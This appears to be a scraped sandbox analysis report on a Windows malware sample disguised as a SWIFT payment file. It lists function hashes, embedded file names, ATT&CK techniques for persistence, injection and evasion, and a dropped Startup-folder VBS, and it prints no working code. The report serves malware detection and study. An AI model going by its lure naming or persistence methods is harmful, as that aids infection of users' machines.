Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733709a07e09fc350f85c4c694f4265a96e8b3af3b997317a6efd7510cf45d14
Instruction ID: 4c535c47fcc085c9f4d73c9aaebac3cf038096e759d7d151a3a0b5fa45a2cdc8
Opcode Fuzzy Hash: 733709a07e09fc350f85c4c694f4265a96e8b3af3b997317a6efd7510cf45d14
Instruction Fuzzy Hash: 5ED017757401194FC708EB6CE05186973EE9F8D62430140A6E50ADB372E9A1EC41C794

Function 00E811C8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fda9ce61ca2683ccf4dea64423ee13e24cbc06d469adcf706c9c7359465147e
Instruction ID: 6c8e7e66f3925c3ed5495912adc78215559c8ae0db575e4a84c7d5341fc521ae
Opcode Fuzzy Hash: 2fda9ce61ca2683ccf4dea64423ee13e24cbc06d469adcf706c9c7359465147e
Instruction Fuzzy Hash: 36D0C935714214CFCB04EBB9E80C85E77E9EF8A66135041A6F906C7734EE75DC028B95

Function 00E80E25 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77efc290036df5011d8b457b8546d56af84c0fc1b6246bd46e3d065e2d305363
Instruction ID: c9ff138b3a385aa2a4b82b05f6747a8c6ed83b9836bbb35117ea81e1cfb2d144
Opcode Fuzzy Hash: 77efc290036df5011d8b457b8546d56af84c0fc1b6246bd46e3d065e2d305363
Instruction Fuzzy Hash: A3D01231A24626CADBA52F924E046AFBA24A720784F1255E0E42E72030D630485A4BC3

Function 00E80A62 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e184b0c4739c3620e1a1feac81c513abbe6265c93c3db22537df64bda929e32
Instruction ID: ecae031029283059086a3f835484bc80ca0ddcb861f0933e36519ac31e9dd61e
Opcode Fuzzy Hash: 2e184b0c4739c3620e1a1feac81c513abbe6265c93c3db22537df64bda929e32
Instruction Fuzzy Hash: 31C08C6608E3C05EDB0303B028769C47FB06C0306930900C7D485DA873C10400958711

Function 00E8BFA0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4893b25ea3ff72229f47c965becf199128f84f664c25b4b6b4d263bb3b23d1
Instruction ID: e9bf24d6a54f5b2edafc9c1d30e963daa614c301bd85dc1a6805ce5523a351d9
Opcode Fuzzy Hash: db4893b25ea3ff72229f47c965becf199128f84f664c25b4b6b4d263bb3b23d1
Instruction Fuzzy Hash: 04A02230082B0E8A822032B0200202233CCC88020A3C228B8E20C08A220833E8A08280

Function 00E80A70 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647146a40e87572659bb26a100e2d3cd4e23299b5e33c49e4a13fa3a4be2e02b
Instruction ID: db995cf1bc98672ef65d8173af80456ce520b2c8765cd37e93e67636fedd0c71
Opcode Fuzzy Hash: 647146a40e87572659bb26a100e2d3cd4e23299b5e33c49e4a13fa3a4be2e02b
Instruction Fuzzy Hash: 8E90223000020C8B080023C03C08080B32C80000223800000B00C008000E0020200380

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Binary or memory string: OriginalFilename vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000031C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNgokdeww.exe" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000000.2016188141.0000000000C34000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWlrwryeomc.exe` vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.000000000306E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2340446288.0000000005E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXbnpdfvent.dll" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2319968821.000000000129E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWlrwryeomc.exe` vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3275567698.0000000002912000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQslgicyik.dll" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274101454.00000000005AA000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNgokdeww.exe" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3277767577.0000000005090000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameQslgicyik.dll" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3275937456.0000000003975000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQslgicyik.dll" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3275937456.0000000003B75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQslgicyik.dll" vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000978000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Binary or memory string: OriginalFilenameWlrwryeomc.exe` vs 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe

C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Function 061AE2F0 Relevance: 3.1, Strings: 2, Instructions: 618
COMMON

Function 060B0006 Relevance: 3.0, Strings: 2, Instructions: 464
COMMON

Function 060B0040 Relevance: 2.9, Strings: 2, Instructions: 448
COMMON

Function 060C7878 Relevance: 2.7, Strings: 2, Instructions: 242
COMMON

Function 061AE2E0 Relevance: 2.7, Strings: 2, Instructions: 176
COMMON

Function 060BB8B0 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Function 060BA5F0 Relevance: 4.2, Strings: 3, Instructions: 478
COMMON

Function 060BC2A8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 060B6B08 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Function 05FD29D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Function 060B9CA0 Relevance: 2.9, Strings: 2, Instructions: 351
COMMON

Function 05FD35A0 Relevance: 2.8, Strings: 2, Instructions: 279
COMMON

Function 060B6120 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Function 060B86E0 Relevance: 2.7, Strings: 2, Instructions: 151
COMMON